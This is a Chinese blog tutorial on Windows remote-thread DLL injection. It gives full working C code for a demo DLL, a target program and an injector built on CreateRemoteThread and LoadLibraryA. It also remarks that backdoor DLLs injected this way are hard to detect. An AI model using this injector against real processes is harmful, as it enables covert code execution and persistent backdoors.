Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >远程线程进行DLL注入

远程线程进行DLL注入

作者头像
用户1631416
发布于 2021-02-24 08:16:14
发布于 2021-02-24 08:16:14
76700
代码可运行
举报
文章被收录于专栏:玄魂工作室玄魂工作室
运行总次数:0
代码可运行

首先简单说一下实现功能:当目标应用程序运行中的状态时,将DLL注入到该目标应用程序内存并执行DLL中的代码。

1. 首先编写我们的DLL

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
DWORD Threads(LPVOID s){
  for(;;){
    Sleep(1000);
    printf("线程注入OK...\n");
  }
}
BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
           )
{
  switch(ul_reason_for_call){
  case DLL_PROCESS_ATTACH:
    CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)Threads,0,0,NULL);
    break;  
  }
  
    return TRUE;
}

当DLL被初次映射到进程的地址空间中时,系统将调用该DLL的DllMain函数,然后创建一个线程,执行Threads这个函数的代码。

2. 编写目标的应用程序

这里通过创建了一个线程,执行fun函数,比较简单

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
//被执行的代码

#include "stdafx.h"

void fun(){

  for(int i=0;i<=10;i++){
    Sleep(1000);
    printf("Fun()...\n");
  }
}

DWORD threads(LPVOID s){
  fun();
  return 0;
}

int main(int argc, char* argv[])
{
  HANDLE handle = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)threads,0,0,NULL);
  getchar();
  return 0;
}

这就是我们目标应用的具体功能

3.进行远程线程注入

首先说一下几个步骤

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
1.获取进程句柄  2.计算dll名字  3.给目标进程申请空间 
4.拷贝dll进去   5.获取模块地址  6.获取函数地址
7.创建远程线程 加载dll    8.关闭句柄

加载DLL的话,肯定是要用到LoadLibrary函数进行加载,而这个函数在kernel32.dll这个dll里面。而exe文件都会包含这个dll的,就属于系统提供的。

代码如下:

//注入代码如下

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#include "stdafx.h"
#include <windows.h>
void LoadDll(DWORD Did,char* pathname){
  //1.获取进程句柄
  HANDLE hprocess = OpenProcess(PROCESS_ALL_ACCESS,NULL,Did);
  //2.计算dll名字
  DWORD dwlength = strlen(pathname)+1;
  //3.给目标进程申请空间
  LPSTR FileRemote = (LPSTR)VirtualAllocEx(hprocess,NULL,dwlength,MEM_COMMIT,PAGE_READWRITE);
  //4.拷贝dll进去
  WriteProcessMemory(hprocess,(LPVOID)FileRemote,(LPVOID)pathname,dwlength,NULL);
  //5.获取模块地址
  HMODULE hkernel = GetModuleHandle("Kernel32.dll");
  //6.获取函数地址
  DWORD loadaddr =(DWORD)GetProcAddress(hkernel,"LoadLibraryA");
  //7.创建远程线程 加载dll 

  DWORD threadID;
  HANDLE t = CreateRemoteThread(hprocess,NULL,0,(LPTHREAD_START_ROUTINE)loadaddr,(LPVOID)FileRemote,0,&threadID);
  //8.关闭句柄
  CloseHandle(t);


}
int main(int argc, char* argv[])
{
  LoadDll(14144,"C:\\Users\\Administrator\\Desktop\\ASD.dll");//PID和DLL
  printf("按下回车终止\n");
  getchar();
  return 0;
}


可以看到我们的PID是22484,这里也可以完全自动获取PID,懒得写了

当我们运行我们的远程线程注入后,可以看到目标进程执行了我们注入进去的DLL代码,为此注入成功!

当然在权限维持的时候,有的DLL被写成后门注入进去,这样更不易发现。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-01-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 玄魂工作室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
C/C++ 远程线程DLL注入
64位进程,就得用64位的EXE来CreateRemoteThread, 另外DLL也应该是64位
王 瑞
2022/12/28
6350
C/C++ 实现常用的线程注入
各种API远程线程注入的方法,分别是 远程线程注入,普通消息钩子注入,全局消息钩子注入,APC应用层异步注入,ZwCreateThreadEx强力注入,纯汇编实现的线程注入等。
王 瑞
2022/12/28
7520
DLL远程线程注入
CreateToolhelp32Snapshot函数 https://learn.microsoft.com/zh-cn/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot 获取指定进程的快照,以及这些进程使用的堆、模块和线程。(也就是说,我们可以利用这个函数来获取进程的PID)
YanXia
2023/04/07
7710
DLL远程线程注入
3.1 DLL注入:常规远程线程注入
动态链接库注入技术是一种特殊的技术,它允许在运行的进程中注入DLL动态链接库,从而改变目标进程的行为。DLL注入的实现方式有许多,典型的实现方式为远程线程注入,该注入方式的注入原理是利用了Windows系统中提供的CreateRemoteThread()这个API函数,该函数第四个参数是准备运行的线程,我们将LoadLibrary()函数填入其中,这样就可以执行远程进程中的LoadLibrary()函数,进而将我们自己准备的DLL加载到远程进程空间中执行,DLL在被装载后则会自动执行初始化部分。
王 瑞
2023/09/13
1.2K0
远程线程注入Dll,突破Session 0
其实今天写这个的主要原因就是看到倾旋大佬有篇文章提到:有些反病毒引擎限制从lsass中dump出缓存,可以通过注入lsass,就想试试注入lsass
HACK学习
2021/05/14
1.2K0
C/C++ 实现远程线程DLL注入
远程线程注入是最常用的一种注入技术,该技术利用的核心API是 `CreateRemoteThread()` 这个API可以运行远程线程,其次通过创建的线程调用 `LoadLibraryA()` 这个函数动态载入指定的DLL即可实现运行DLL, 而`LoadLibrary()`函数在任何一个可执行文件中都可以被调用到,这就给我们注入提供了有效的条件.
王 瑞
2022/12/28
6660
自由控制程序运行方式的编程技巧
本篇继续阅读学习《有趣的二进制:软件安全与逆向分析》,本章是自由控制程序运行方式的编程技巧,主要介绍调试器的原理、代码注入和API钩子
中龙技术
2022/09/29
7000
自由控制程序运行方式的编程技巧
3.3 DLL注入:突破会话0强力注入
Session是Windows系统的一个安全特性,该特性引入了针对用户体验提高的安全机制,即拆分Session 0和用户会话,这种拆分Session 0和Session 1的机制对于提高安全性非常有用,这是因为将桌面服务进程,驱动程序以及其他系统级服务取消了与用户会话的关联,从而限制了攻击者可用的攻击面。
王 瑞
2023/09/13
4090
滴水逆向初级-win32(四)
4.1.C语言中的宽字符 1、常用函数 char wchar_ t //多字节字符类型 宽字符类型 printf wprintf //打印到控制台函数 strlen wcslen //获取长度 strcpy wcscpy //字符串复制 strcat wcscat //字符串拼接 strcmp wcscmp //字符串比较 strstr wcsstr //字符串查找 2、打印宽字符 #include <locale.h> setlocale(LC_ALL,") /
zhang_derek
2021/04/13
2.4K0
远程线程注入引出的问题
远程线程注入引出的问题 一、远程线程注入基本原理 远程线程注入——相信对Windows底层编程和系统安全熟悉的人并不陌生,其主要核心在于一个Windows API函数CreateRemoteThread,通过它可以在另外一个进程中注入一个线程并执行。在提供便利的同时,正是因为如此,使得系统内部出现了安全隐患。常用的注入手段有两种:一种是远程的dll的注入,另一种是远程代码的注入。后者相对起来更加隐蔽,也更难被杀软检测。本文具体实现这两种操作,在介绍相关API使用的同时,也会解决由此引发的一些问题。 顾名思义
Florian
2018/02/05
1.8K0
远程线程注入引出的问题
DLL注入explorer.exe进程[通俗易懂]
  最近一直在学习dll注入远程进程的相关知识,于是有了这篇文章。通过注入的方式会运行程序,在资源管理器中是看不到,相关的进程的,这为程序的隐藏提供了极大的便利。
全栈程序员站长
2022/08/29
2.4K1
红队 | Windows注入的一些方式
在渗透过程中有时候为了权限维持或者其他等一些操作,比如以前的搜狗输入法可以替换dll文件当用户切换输入法就会去加载我们替换的dll文件,dll文件可以自己编写一些net user或者其他的一些方法,也可以通过msf等来生成dll文件进行替换。
HACK学习
2021/08/13
1.1K0
突破SESSION0隔离的远程线程注入
传统的远程线程技术一般是向普通用户进程注入线程。而要是想隐藏的更深,则需要突破SESSION0隔离机制,将自身进程注入到系统进程中,使得自己更加隐蔽。 突破SESSION0隔离的远程线程注入与传统的CreateRemoteThread实现DLL远程线程注入相比区别在与是用更为底层的ZwCreateEx函数来创建的。
YanXia
2023/04/07
4530
突破SESSION0隔离的远程线程注入
C++进程注入
#include "stdafx.h" #include <windows.h> #include <string> #include "stdio.h" #include <iostream> using namespace std; #define DEF_BUF_SIZE 1024 // 用于存储注入模块DLL的路径全名 char szDllPath[DEF_BUF_SIZE] = {0} ; // 使用远程线程向指定ID的进程注入模块 BOOL InjectModuleToProcessBy
liulun
2022/05/09
9870
恶意软件开发——突破SESSION 0 隔离的远线程注入
在Windows XP,Windows Server 2003以及更早的版本中,第一个登录的用户以及Windows的所有服务都运行在Session 0上,这样的做法导致用户使用的应用程序可能会利用Windows的服务程序提升自身的权限,为此,在后续的Windows版本中,引入了一种隔离机制,普通应用程序已经不再session 0中运行。
玖柒的小窝
2021/09/15
7480
恶意软件开发——突破SESSION 0 隔离的远线程注入
windows-DLL注入「建议收藏」
DLL注入 刚刚整理的代码注入(远程线程注入)现在整理这个DLL注入,DLL注入比较常用,相比远程代码注入DLL注入没有什么太多的限制,而且实现起来比较简单,当然远程线程需要注意的问题DLL很多情况都需要注意,这里不做重复,只说代码注入里面没有说过的部分。DLL注入的方式不唯一,比如你如果完全看懂了代码注入,那么你直接LoadLibrary地址和一个dll路径传进去然后在里面load一下就行了,也就是之前的代码注入完全可以实现dll注入,今天就说下一通常dll的注入方式吧,通常dll的注入比我刚刚说的那个方法还要简单,流程和代码注入差不多但是简单了很多,思路是这样,LoadLibrary这个函数所有的进程都是地址一样,我们直接获取LoadLibrary的地址,然后在CreateRemoteThread里面直接把这个地址作为线程地址传过去,然后参数就是我们已经拷贝到对方内存里的那个字符串,这样直接就跑起来了,非常简单,在DLL里想干什么就干什么,可以和本地写代码一样,然后还有一个问题,就是注意一下,dll在入口的switch里面的第一个分支直接调用你想干的事就行了,那个分支的意思就是说当dll被第一次载入的时候就自动执行了,OK就这么简单,如果你觉得没听懂,那么需要看我之前说的那个代码注入,这个里面只说了新的东西,还有就是dll注入应该注意的几个地方: 1.dll的入口记得就调用自己的函数,别走正当的流程,如果你非蛋疼的想调用某个指定函数,当然可以用代码注入结合dll注入的方式,但是 然并卵。 2.注意系统问题,32exe+32dll注入32位程序,64exe+64dll注入64位程序。
全栈程序员站长
2022/08/29
9630
进程注入1:通过LoadLibrary注入DLL
进程注入是将任意代码写入已经运行的进程中并执行,可以用来逃避检测对目标目标进程中的敏感信息进行读/写/执行访问,还可以更改该进程的行为。
黑白天安全
2021/04/07
2.6K0
进程注入1:通过LoadLibrary注入DLL
DLL注入
继续学习《逆向工程核心原理》,本篇笔记是第三部分:DLL注入,主要包括三种DLL注入、DLL卸载、修改PE、代码注入等内容
中龙技术
2022/09/29
1.9K0
DLL注入
干货|Windows下进程操作的一些C++代码
0x01 进程遍历 因为进程是在随时进行变动的所以我们需要获取一张快照 1.1 CreateToolhelp32Snapshot HANDLE CreateToolhelp32Snapshot( DWORD dwFlags, DWORD th32ProcessID); 因为要获取进程第一个参数选择TH32CS_SNAPPROCESS来获取系统中所有的进程,具体可以参考[CreateToolhelp32Snapshot]:https://docs.microsoft.com/zh-cn/windows/w
HACK学习
2021/08/13
1.5K0
使用远程线程注入DLL
用户1423082
2024/12/31
910
相关推荐
C/C++ 远程线程DLL注入
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验